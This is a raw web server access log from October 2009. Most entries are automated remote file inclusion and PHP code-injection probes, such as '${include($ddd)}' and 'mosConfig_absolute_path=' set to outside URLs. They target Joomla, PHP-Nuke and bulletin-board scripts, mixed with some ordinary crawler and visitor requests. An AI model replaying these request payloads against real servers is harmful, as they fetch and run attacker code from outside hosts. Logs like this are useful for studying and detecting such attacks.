222.73.17.7 - - [18/Oct/2009:02:39:35 -0400] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.73.17.7 - - [18/Oct/2009:02:39:35 -0400] "GET /logs/access_log.Q109090700//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.73.17.7 - - [18/Oct/2009:02:39:35 -0400] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [18/Oct/2009:02:39:49 -0400] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.73.17.7 - - [18/Oct/2009:02:39:49 -0400] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [18/Oct/2009:02:39:49 -0400] "GET /logs/access_log.Q109090700//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.73.17.7 - - [18/Oct/2009:02:39:50 -0400] "GET /logs/access_log.Q109091100//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
71.6.151.148 - - [18/Oct/2009:02:39:50 -0400] "GET /logs/errors.php?error=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
71.6.151.148 - - [18/Oct/2009:02:39:51 -0400] "GET /logs/access_log.Q109092200/errors.php?error=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
71.6.151.148 - - [18/Oct/2009:02:39:51 -0400] "GET /errors.php?error=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.176.226.164 - - [18/Oct/2009:02:39:52 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 214 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
81.176.226.164 - - [18/Oct/2009:02:39:52 -0400] "GET /logs/access_log.Q109072600///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 236 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
81.176.226.164 - - [18/Oct/2009:02:39:52 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 209 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
81.176.226.164 - - [18/Oct/2009:02:39:53 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
81.176.226.164 - - [18/Oct/2009:02:39:53 -0400] "GET /logs/access_log.Q109072600///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
81.176.226.164 - - [18/Oct/2009:02:39:53 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
222.73.17.7 - - [18/Oct/2009:02:39:53 -0400] "GET /logs/access_log.Q109091100//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
81.176.226.164 - - [18/Oct/2009:02:39:54 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
81.176.226.164 - - [18/Oct/2009:02:39:54 -0400] "GET /logs/access_log.Q109072600///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
81.176.226.164 - - [18/Oct/2009:02:39:54 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
81.176.226.164 - - [18/Oct/2009:02:39:54 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 209 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
81.176.226.164 - - [18/Oct/2009:02:39:54 -0400] "GET /logs/access_log.Q109072600///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 236 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
81.176.226.164 - - [18/Oct/2009:02:39:54 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 214 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
81.176.226.164 - - [18/Oct/2009:02:39:58 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
81.176.226.164 - - [18/Oct/2009:02:39:58 -0400] "GET /logs/access_log.Q109072600///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
81.176.226.164 - - [18/Oct/2009:02:39:58 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
95.211.6.161 - - [18/Oct/2009:02:40:02 -0400] "GET /logs/access_log.Q109081700//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
71.6.151.148 - - [18/Oct/2009:02:40:12 -0400] "GET /logs/error_log.Q109092300/errors.php?error=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
95.211.6.161 - - [18/Oct/2009:02:40:20 -0400] "GET /logs/access_log.Q109061400//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:02:41:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
71.6.151.148 - - [18/Oct/2009:02:42:08 -0400] "GET /logs/access_log.Q109092200%20%20/errors.php?error=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
71.6.151.148 - - [18/Oct/2009:02:42:13 -0400] "GET /logs/error_log.Q109092300%20%20/errors.php?error=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:02:42:53 -0400] "GET /lostpasswd.php?env[include_prefix]=http://hana.nef-i.co.kr/pds/zfxid1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:02:42:53 -0400] "GET /logs/access_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://hana.nef-i.co.kr/pds/zfxid1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:02:42:53 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://hana.nef-i.co.kr/pds/zfxid1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
66.249.71.152 - - [18/Oct/2009:02:42:53 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0135794C96282900D8E806W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.27.9.117 - - [18/Oct/2009:02:43:03 -0400] "GET /logs/error_log.Q109072700%20%20/lostpasswd.php?env[include_prefix]=http://hana.nef-i.co.kr/pds/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
82.193.15.3 - - [18/Oct/2009:02:44:06 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
82.193.15.3 - - [18/Oct/2009:02:44:06 -0400] "GET /logs/access_log.Q109090600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
82.193.15.3 - - [18/Oct/2009:02:44:06 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
82.193.15.3 - - [18/Oct/2009:02:44:06 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
174.143.3.188 - - [18/Oct/2009:02:46:42 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
174.143.3.188 - - [18/Oct/2009:02:46:42 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
174.143.3.188 - - [18/Oct/2009:02:46:42 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
174.143.3.188 - - [18/Oct/2009:02:46:43 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/3.0 (OS/2; U)"
99.37.31.69 - - [18/Oct/2009:02:47:47 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.2.1910.1554; Windows 6.0; MSIE 7.0.6001.18000)"
99.37.31.69 - - [18/Oct/2009:02:47:48 -0400] "GET /favicon.gif HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.2.1910.1554; Windows 6.0; MSIE 7.0.6001.18000)"
66.249.71.51 - - [18/Oct/2009:02:47:52 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
64.27.9.117 - - [18/Oct/2009:02:48:49 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://hana.nef-i.co.kr/pds/zfxid1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:02:48:58 -0400] "GET /logs/error_log.Q109072700/lostpasswd.php?env[include_prefix]=http://hana.nef-i.co.kr/pds/zfxid1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
58.27.173.116 - - [18/Oct/2009:02:49:22 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
58.27.173.116 - - [18/Oct/2009:02:49:22 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.182.17.220 - - [18/Oct/2009:02:49:22 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19"
94.182.17.220 - - [18/Oct/2009:02:49:22 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19"
58.27.173.116 - - [18/Oct/2009:02:49:32 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
58.27.173.116 - - [18/Oct/2009:02:49:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.182.17.220 - - [18/Oct/2009:02:49:59 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19"
174.133.148.98 - - [18/Oct/2009:02:52:12 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
174.133.148.98 - - [18/Oct/2009:02:52:12 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 22328 "-" "Mozilla/5.0"
174.133.148.98 - - [18/Oct/2009:02:52:45 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
174.133.148.98 - - [18/Oct/2009:02:52:45 -0400] "GET /logs/access_log.Q109090300///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.133.148.98 - - [18/Oct/2009:02:52:45 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 22328 "-" "Mozilla/5.0"
66.249.71.152 - - [18/Oct/2009:02:52:59 -0400] "GET /logs/error_log.Q109052300 HTTP/1.1" 200 3564757 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
206.225.23.4 - - [18/Oct/2009:02:57:10 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:57:10 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:57:10 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:57:11 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:57:11 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:57:11 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:57:12 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:57:12 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:57:12 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:57:20 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:57:21 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:57:22 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.143.3.188 - - [18/Oct/2009:02:58:07 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
174.143.3.188 - - [18/Oct/2009:02:58:07 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Avant Browser (http://www.avantbrowser.com)"
174.143.3.188 - - [18/Oct/2009:02:58:07 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
174.143.3.188 - - [18/Oct/2009:02:58:07 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
206.225.23.4 - - [18/Oct/2009:02:58:57 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:58:57 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:59:04 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:59:04 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:59:06 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:02:59:06 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
82.193.15.3 - - [18/Oct/2009:02:59:24 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
82.193.15.3 - - [18/Oct/2009:02:59:24 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
82.193.15.3 - - [18/Oct/2009:02:59:24 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
82.193.15.3 - - [18/Oct/2009:02:59:24 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
174.133.148.98 - - [18/Oct/2009:03:00:22 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
174.133.148.98 - - [18/Oct/2009:03:00:22 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 22328 "-" "Mozilla/5.0"
174.133.148.98 - - [18/Oct/2009:03:01:27 -0400] "GET /logs/access_log.Q109090300///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:02:03 -0400] "GET /logs/error_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:02:08 -0400] "GET /logs/error_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:02:13 -0400] "GET /logs/error_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:03:03:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.32.10 - - [18/Oct/2009:03:04:19 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
